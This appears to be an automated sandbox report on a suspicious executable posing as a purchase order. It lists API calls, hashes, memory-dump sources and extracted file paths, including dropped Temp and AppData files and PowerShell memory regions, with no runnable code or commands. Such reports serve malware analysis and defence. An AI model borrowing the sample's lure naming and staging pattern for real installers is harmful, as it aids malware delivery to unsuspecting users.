• String ID: "C:\Users\user\Desktop\PO_00290292.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-3491917242
• Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
• Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
• Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
• Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004042C6
• GetSysColor.USER32(00000000), ref: 004042E2
• SetTextColor.GDI32(?,00000000), ref: 004042EE
• SetBkMode.GDI32(?,?), ref: 004042FA
• GetSysColor.USER32(?), ref: 0040430D
• SetBkColor.GDI32(?,?), ref: 0040431D
• DeleteObject.GDI32(?), ref: 00404337
• CreateBrushIndirect.GDI32(?), ref: 00404341
Memory Dump Source
• Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
• Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
• Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
• Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
  • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4A
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
Memory Dump Source
• Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
• Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
• Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
• Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
• GetTickCount.KERNEL32 ref: 00402DD8
• wsprintfW.USER32 ref: 00402E06
  • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
  • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
  • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
  • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
  • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
  • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
  • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
• CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
• ShowWindow.USER32(00000000,00000005), ref: 00402E38
  • Part of subcall function 00402D83: MulDiv.KERNEL32(00000000,00000064,000013DE), ref: 00402D98
Memory Dump Source
• Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
• Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
• Opcode Fuzzy Hash: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
• Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
• GetMessagePos.USER32 ref: 00404BCA
• ScreenToClient.USER32(?,?), ref: 00404BE4
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
Memory Dump Source
• Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
• Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
• Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
• Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
Uniqueness
Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D59
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                  • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID: Tahoma
                                                                  • API String ID: 3808545654-3580928618
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                  • wsprintfW.USER32 ref: 00402D56
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                  • API String ID: 1451636040-1158693248
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                  • wsprintfW.USER32 ref: 00404B43
                                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$(7B
                                                                  • API String ID: 3540041739-1320723960
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,000000FF,practical,00000400,?,?,00000021), ref: 00402583
                                                                  • lstrlenA.KERNEL32(practical,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,000000FF,practical,00000400,?,?,00000021), ref: 0040258E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini$practical
                                                                  • API String ID: 3109718747-2608176021
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-4083868402
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$1033
                                                                  • API String ID: 530164218-4006631066
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00405280
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
                                                                    • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_00290292.exe,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405B84
                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_00290292.exe,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405B94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-1876063424
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
                                                                  • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1698772021.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_f3d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1698772021.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_f3d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1699834529.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4c40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84l$84l$84l$84l$84l$84l$_
                                                                  • API String ID: 0-1999844729
                                                                  • Opcode ID: db638a59f18502be0c6d8c61b78bb9a01c1c13542676fa7b442ccf0f0dded009
                                                                  • Instruction ID: 3e0efd9af09eb1a0287b376aad9d671c3d1ba88f92ff2e16ad94173f16a0d0ba
                                                                  • Opcode Fuzzy Hash: db638a59f18502be0c6d8c61b78bb9a01c1c13542676fa7b442ccf0f0dded009
                                                                  • Instruction Fuzzy Hash: 6F22B4B1B00219DFDB15DBA888117AABBF6FB89610F24C45EE905AB341DB32DD41C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl$(fl
                                                                  • API String ID: 0-1194790885
                                                                  • Opcode ID: 21f95be14c1f3267fe8ae9a94886f002d593bc56d4eecc9a16bf995a20f84e4a
                                                                  • Instruction ID: 021a7a2ba1480642c1f4727956fd4e1d638704b6d7396a5fa23bbd102eaad5bf
                                                                  • Opcode Fuzzy Hash: 21f95be14c1f3267fe8ae9a94886f002d593bc56d4eecc9a16bf995a20f84e4a
                                                                  • Instruction Fuzzy Hash: 14C27DB0B00209DFD714DB98C951BAAB7B2BF85714F24C06AD905AF751CB72DC81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4l$4l
                                                                  • API String ID: 0-2351638723
                                                                  • Opcode ID: d4aa34a7f685c8e0641c1a4e5c9793c9bc84f40abf9b2107c2eacc100ad240fe
                                                                  • Instruction ID: e7ea27aad863c77dc6399d34f420eb371071bca410373dc577416ddff04d98d9
                                                                  • Opcode Fuzzy Hash: d4aa34a7f685c8e0641c1a4e5c9793c9bc84f40abf9b2107c2eacc100ad240fe
                                                                  • Instruction Fuzzy Hash: 3D529EB4A10214DFD724CB58C940BE9B7B2BF88704F24849AD9096F751CBB6ED82CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl$(fl
                                                                  • API String ID: 0-1194790885
                                                                  • Opcode ID: 4a08a874a72691cbe297b07f7b3fdfe1748474336b2076196ebdac8e7f345f4c
                                                                  • Instruction ID: 9dd8c692f5a7e43055141fc9193eb35545752eeb36f3cf23bf46b3b03304d63f
                                                                  • Opcode Fuzzy Hash: 4a08a874a72691cbe297b07f7b3fdfe1748474336b2076196ebdac8e7f345f4c
                                                                  • Instruction Fuzzy Hash: A6E19EB0A00245DFDB14DBA8C565FAEBBB2BF89704F20842AD9016F755CB75EC81CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl
                                                                  • API String ID: 0-423539152
                                                                  • Opcode ID: 611e054439d6af6834ce2f99d0310b9931200af6c29d8fca31ec92321c21848a
                                                                  • Instruction ID: 772667c6aa62bbfb3653e3bb9b6a280b2b7b2c24756a5f48400fcee375eba2cc
                                                                  • Opcode Fuzzy Hash: 611e054439d6af6834ce2f99d0310b9931200af6c29d8fca31ec92321c21848a
                                                                  • Instruction Fuzzy Hash: 4B124BB4A11209DFE714CB98C580FAABBB2BF84714F14C05AE9056F751C772EC81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
